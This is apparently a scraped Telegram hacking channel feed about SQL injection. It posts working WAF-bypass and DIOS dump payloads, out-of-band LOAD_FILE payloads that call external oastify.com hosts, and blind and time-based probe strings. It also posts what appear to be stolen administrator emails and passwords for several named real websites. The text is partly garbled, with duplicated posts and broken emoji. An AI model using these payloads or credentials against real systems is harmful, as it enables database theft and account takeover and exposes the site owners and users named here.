Bangresta.txt
1.1 KB
Bangresto 1.0 SQLi
đŗ Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
⥠ī¸ Demo
đŗ Software
đ Reference
đ Description:
he
The payload ' was submitted in the itemID parameter, and a database
error message was returned.
The attacker can be stooling all information from the database of this
application.
đ Category: web applications
đģ Platform: php
đĒ Risk: [Security Risk High]
#SQL #Injection #Php
â â â â â â â â â â â â
đ¤ T.me/MRvirusIRBOT
đĸ T.me/SashClient
đĒŠ Https://discord.gg/UfFvDYBBMM
đ Https://sash.mybin.ir
he
itemID parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the itemID parameter, and a database
error message was returned.
The attacker can be stooling all information from the database of this
application.
#SQL #Injection #Php
Please open Telegram to view this post
VIEW IN TELEGRAM
đ https://www.ntbcl.com
đ¤ name: Admin
đ§ email: ntbcl_adminn@ntbcl.com
đ password: NewP30MAY@$#
đĢ login page: N/A
#web #sql
ââââââââââ
đ¤ T.me/MRvirusIRBOT
đĸ T.me/BugCod3
đ¤ name: Admin
đ§ email: ntbcl_adminn@ntbcl.com
đ password: NewP30MAY@$#
đĢ login page: N/A
#web #sql
ââââââââââ
đ¤ T.me/MRvirusIRBOT
đĸ T.me/BugCod3
đ aeronsindia.com
đ¤ Name: Admin
đ§ Email: admin@aeronsindia.com
đ Password: admin12345
đ§ Email: anilverm404@gmail.com
đ Password: 123
đ Version: 5.6.51
đ Database: aeronsin_web
đĢ login page: N/A
#web #sql
ââââââââââ
đ¤ T.me/MRvirusIRBOT
đĸ T.me/BugCod3
đ¤ Name: Admin
đ§ Email: admin@aeronsindia.com
đ Password: admin12345
đ§ Email: anilverm404@gmail.com
đ Password: 123
đ Version: 5.6.51
đ Database: aeronsin_web
đĢ login page: N/A
#web #sql
ââââââââââ
đ¤ T.me/MRvirusIRBOT
đĸ T.me/BugCod3
đ http://www.simscollege.ac.in
đ¤ Username: admin
đ Password: simsxyz
đ Version: 10.5.22-MariaDB
đĢ Database: N/A
â login page: /members.php
#web #sql
ââââââââââ
đ¤ T.me/MRvirusIRBOT
đĸ T.me/BugCod3
đ¤ Username: admin
đ Password: simsxyz
đ Version: 10.5.22-MariaDB
đĢ Database: N/A
â login page: /members.php
#web #sql
ââââââââââ
đ¤ T.me/MRvirusIRBOT
đĸ T.me/BugCod3
SQL Injection Bypass
âââââââââ
if your target have waf you should bypass that to access the database.
Lets start đĨˇđŊ
#sqli #sql_injection
ââââââââââ
đ¤ T.me/BugCod3BOT
đĸ T.me/BugCod3
âââââââââ
if your target have waf you should bypass that to access the database.
Lets start đĨˇđŊ
ORDER BY â>
/*!50000Order*/by
/*!50000order*//*!50000by*/
/*!50000OrdeR*/By
/*!50000ORDER*//*!50000BY*/
/**A**/Order by
Order/**A**/By
/**/**/ORDER/**/BY/**/**/
Null' order by
O0x72der b0x7920
Union â>
/*!50000union select
/*!50000Union*//*!50000Select*/
/*!12345union*//*!12345select*/
/**A**/union select
union /**A**/ select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
%23%0AUnion%23aaaaaaaaaa%0ASelect%23%0A1
+?UnI?On?+'SeL?ECT?
group_concat â>
group_concat(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
from table_name â>
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
#sqli #sql_injection
ââââââââââ
đ¤ T.me/BugCod3BOT
đĸ T.me/BugCod3
â¤6â¤âđĨ2đ1
BugCod3
#SQL #Dios #Bypass #Waf #POC
Please open Telegram to view this post
VIEW IN TELEGRAM
âĄ2â¤1đ1
Advance Error Based My SQL 5.5 (DIOS)
/Bypass My SQL 5.5 version dump database error/
DIOS:
#SQL #Dios #Bypass #POC
ââââââââââ
đ¤ T.me/BugCod3BOT
đĸ T.me/BugCod3
/Bypass My SQL 5.5 version dump database error/
DIOS:
and(select+x*1E308+from(select+concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@)x)y)
#SQL #Dios #Bypass #POC
ââââââââââ
đ¤ T.me/BugCod3BOT
đĸ T.me/BugCod3
âĄ3â¤1
Advanced SQL Injection for AWAE
Goal is to master SQL Injection Discovery, Detection and Exploitation
đ Table of Content:
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using
- The Alternative ways of using
- The Alternative way of using
- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi
AND...
đ¸ Github
âŦī¸ Download
đ
#Sql #Injection #AWAE
â â â â â â â â â â
đ¤ T.me/BugCod3BOT
đŖ T.me/BugCod3
Goal is to master SQL Injection Discovery, Detection and Exploitation
- Learning a lil' bit of SQL
- SQL Injection Methodology Overview
- MYSQL Injection Methodology
- MySQL Error or UNION Based SQLi
- Routed Queries (Advanced WAF Bypass for Error or UNION based MySQLi)
- WorkAround when UNION queires doesn't work (MySQL Error Based SQLi)
- The Alternative ways of using
AND/OR 0 in SQLi- The Alternative ways of using
NULL in SQLi- The Alternative way of using
WhiteSpace in SQLi- MySQL Boolean Based Blind SQLi
- MySQL Time Based Blind SQLi
AND...
BugCod3#Sql #Injection #AWAE
Please open Telegram to view this post
VIEW IN TELEGRAM
âĄ4đĨ2â¤1đ1
Time-Based SQL Injection
#SQL #Time_Based
â â â â â â â â â â
đ¤ T.me/BugCod3BOT
đŖ T.me/BugCod3
#SQL #Time_Based
Please open Telegram to view this post
VIEW IN TELEGRAM
â¤4âĄ3đĨ2
Out-of-Band SQL Injection
Payload:
#BugBounty #Tips #SQL
ââââââââââ
đ¤ T.me/BugCod3BOT
đŖ T.me/BugCod3
Payload:
'11111111111' AND (SELECT LOAD_FILE('\\\\http://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))
'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'http://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))#BugBounty #Tips #SQL
ââââââââââ
đ¤ T.me/BugCod3BOT
đŖ T.me/BugCod3
â¤3đ3đĨ2âĄ1
SQL injection ID parameter
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
ââââââââââ
đ¤ T.me/BugCod3BOT
đŖ T.me/BugCod3
?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="securtiy"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+
#SQL #Injection #Tips
ââââââââââ
đ¤ T.me/BugCod3BOT
đŖ T.me/BugCod3
đĨ5â¤3âĄ1